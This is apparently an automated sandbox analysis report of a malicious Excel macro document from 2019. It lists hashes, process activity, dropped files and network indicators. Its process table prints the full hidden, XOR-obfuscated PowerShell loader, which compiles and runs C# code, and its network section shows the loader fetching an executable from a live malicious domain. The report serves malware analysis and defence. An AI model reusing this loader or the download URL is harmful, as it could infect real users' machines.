analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | break down.xls |
| Full analysis: | https://app.any.run/tasks/c8400556-045b-44b1-80a3-b61e28a8be46 |
| Verdict: | Malicious activity |
| Analysis date: | July 18, 2019, 08:41:15 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: r93861, Subject: efc38, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jul 15 21:01:29 2019, Last Saved Time/Date: Mon Jul 15 21:01:30 2019, Security: 0 |
| MD5: | 9A1228AA1C399AAC6D7A2236EAD3A636 |
| SHA1: | AFF308876996382B15F1E3C3BE9E42D8291882B2 |
| SHA256: | 97588EFDEEDF98E9B3337131D2B3C322D161DB9A430C2D32B7EFEEC2B426341B |
| SSDEEP: | 1536:Jk3hOdsylKlgryzc4bNhZFGzE+cL2knAZgk+zHYaFRRuDmwtasy:Jk3hOdsylKlgryzc4bNhZFGzE+cL2knz |
MALICIOUS
Starts Visual C# compiler
- powershell.exe (PID: 2640)
SUSPICIOUS
Executed via WMI
- powershell.exe (PID: 2640)
PowerShell script executed
- powershell.exe (PID: 2640)
Creates files in the user directory
- powershell.exe (PID: 2640)
INFO
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 3488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xls | | | Microsoft Excel sheet (48) |
|---|---|---|
| .xls | | | Microsoft Excel sheet (alternate) (39.2) |
EXIF
FlashPix
| Title: | r93861 |
|---|---|
| Subject: | efc38 |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| LastModifiedBy: | Administrator |
| Software: | Microsoft Excel |
| CreateDate: | 2019:07:15 20:01:29 |
| ModifyDate: | 2019:07:15 20:01:30 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: |
|
| HeadingPairs: |
|
| CompObjUserTypeLen: | 31 |
| CompObjUserType: | Microsoft Excel 2003 Worksheet |
Total processes
38
Monitored processes
4
Malicious processes
0
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3488 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
| 2640 | powershell -WindowStyle Hidden function kcf71 { param($pd2bd6) $w672e2 = 'v7d3f6';$ef38a8 = ''; for ($i = 0; $i -lt $pd2bd6.length; $i+=2) { $xb2838 = [convert]::ToByte($pd2bd6.Substring($i, 2), 16); $ef38a8 += [char]($xb2838 -bxor $w672e2[($i / 2) % $w672e2.length]); } return $ef38a8; } $tf1182 = '03440d5d0116254e1747035b4d42175a085156641d4012531b19364608421f5a011d2f580252165c16651345125a0553050c11400f581117374a1542135a4a770f5711590b40125f15445f46155f185044601f450252091d2f794d42175a085156641d4012531b192a56120d7b3d1446045a1f5444500a5705444442005317521f68225a1a7e09430944021f465803441852080054145a720a47144f26580d5d120b547001473644195425570244134417114f6b564711510a5f1517174707421f5444561e4213450a132f58026710414644105455505e1e3f5910631244565c530b0205441b1747145f18504449510040044d083d721a5b2d5e165904434c110d530459015f5504541b44760842044e345c0f5802175913447a1956007f0f540456164a441f2b171446045a1f5444401257025e0713034e0252165d467f1843344714161103050a0057401f1747145f18504440530e12564d083d721a5b2d5e165904434c110d530459015f5504541b44760842044e345c0f58020a46650f440242055f36441943015012145f6a444313541a5e0713154217430d5046530e430141081614580b5f464f150f530b4e7f1843344714161a01065207535a622d5d12660245445204054500071f46431f5910130b01130e57564a1619421013135f184344450052150455514f0d2d73085f2f5b065816474e143d52165d035a45054a570a5a541b44760842044e345c0f58020a4661125a3b5812562b531b58164a441a566401472a57054321411459040a02520a45131e3913154217430d5046530e430141081600580d5746514e020155001e3f5910631244565d560b57001303487a0842264316130c0e4f045c05501a1f5910130102155355025e1f4d4711510a5f1517174707421f54445a0842564d5d025f53151f4d482f580267104146584e01050b52164b170307070f1056521b0d551000551b440741020502510317035c065407170206114f1f4d5e021b080e40565c075b0b3f5910631244586d0141091f0d500b4709160e0f5d0b5004400c197a08422643161308554f5101055b44105455505e1e180f52525e025a5c075551075e155704535747005152550343025504530f440150055606430755005203541e4d080f505e59070a0053400a597a08422643161d3c5304584d4801590258444b5e0f4e0156055d4b237e0a4736420417160753504100550e4e633f59106312445f025f460f5802171d5603544206020e560d1f514c121f554e005c1b08554f5101054a444202020451075a071c07561a194210131f5313555002001f5f4c035c1259564f5c0a5e0044015f4e244f02523f6e464e45525251550b0d071c00571a464f02554a060e0e544e5d7f1843344714161305555252004e0a295214451e56081d275a1a58077b215a1955055f4e055f0c295214451e56081d2559064e4c4b55534055571f561a1305555252004e1b571a5d514e020155001e185213132f58026710414e58150e0256501822582d5d1200421f4d18564e460755514f1a1305555252004e1b571a5d4e4e0e5c0554004c17335604751a5e015d12161a0355575f504b59014446611355275f0f5318434c1a5d4502450d5d01161056555152024b720a450f441959095608425870014720591a5301413657025f4c7608401f450b5d0b5318434a601653155e055f20591a53014148770647085a0557025e0b5d225702564d18446a2a465c070501420146180d551000551b44034e025602050340154d080a0247535d55487219400a5f095712710d5f031e1d540204571e5406010755074603570605074f025d07020647025202540345065106000640035202530310065c065407410354075e0343065d060702140202035f03120602025e0746025203040240025d065207410354075f031307560607064e0607025303450657025f064703060355145f1b0252575442034d083644195401401565025616472f581058444b540417515d0e085301173441095513441760125704432d5d00595e5105020402421e5f631459155217404865025616474e4e440505555f1f4d4501471344181754081b460355085a0516054305470f55564410410f5811170f500001471f1747145f185044565f534f525c1a1d4502450d5d01161d005c5755044b1512040205100146081542045e0a54465142565d5507004b6410410f581119215e16420f0c025c141e1f5910130f0b460c0d0f030f130e010b487a135903470e0d1f1c59014f4d144e10564644105455505e0b35580a4503440219305c244f02524c565f534f525c1d3543144410410f58111f0d1f541f5a06521a5d5142565d5507005d0a4c500e57041e4c41005547545c1338161d005c5755042d1f0d1c541f56124458510e1204561d2a531850105b3b1f4d4a165612430459445452574f5105055d4b0b'; $tf11822 = kcf71($tf1182); Add-Type -TypeDefinition $tf11822; [qfeae]::z919ec(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2564 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\_jfnqw9n.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
| 3760 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF436.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF435.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
Total events
768
Read events
674
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3488 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE86E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BN00SWYAY0CILDG84LH4.temp | — | |
MD5:— | SHA256:— | |||
| 2564 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCF435.tmp | — | |
MD5:— | SHA256:— | |||
| 2564 | csc.exe | C:\Users\admin\AppData\Local\Temp\_jfnqw9n.pdb | — | |
MD5:— | SHA256:— | |||
| 3760 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESF436.tmp | — | |
MD5:— | SHA256:— | |||
| 2564 | csc.exe | C:\Users\admin\AppData\Local\Temp\_jfnqw9n.dll | — | |
MD5:— | SHA256:— | |||
| 2564 | csc.exe | C:\Users\admin\AppData\Local\Temp\_jfnqw9n.out | — | |
MD5:— | SHA256:— | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\_jfnqw9n.cmdline | text | |
MD5:2D79813F0350615D3F37F95A384A89C2 | SHA256:212401DFD299B099037AB1F83C2F3419311683F04BD18DDE5C6BACE490D28EBE | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\_jfnqw9n.0.cs | text | |
MD5:E756C393F2D70789BB33E2F910978FFD | SHA256:4E38BAB008597C060084337DA90B786FB5D2BC72D1424305A46A3520C55F9E18 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2640 | powershell.exe | GET | 301 | 198.136.51.245:80 | http://zeetechbusiness.com/loki/temp/css/html/see.exe | US | — | — | malicious |
2640 | powershell.exe | GET | 404 | 198.136.51.245:80 | http://www.zeetechbusiness.com/loki/temp/css/html/see.exe | US | html | 79.2 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2640 | powershell.exe | 198.136.51.245:80 | zeetechbusiness.com | HostDime.com, Inc. | US | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
zeetechbusiness.com |
| malicious |
www.zeetechbusiness.com |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2640 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2640 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
Process | Message |
|---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|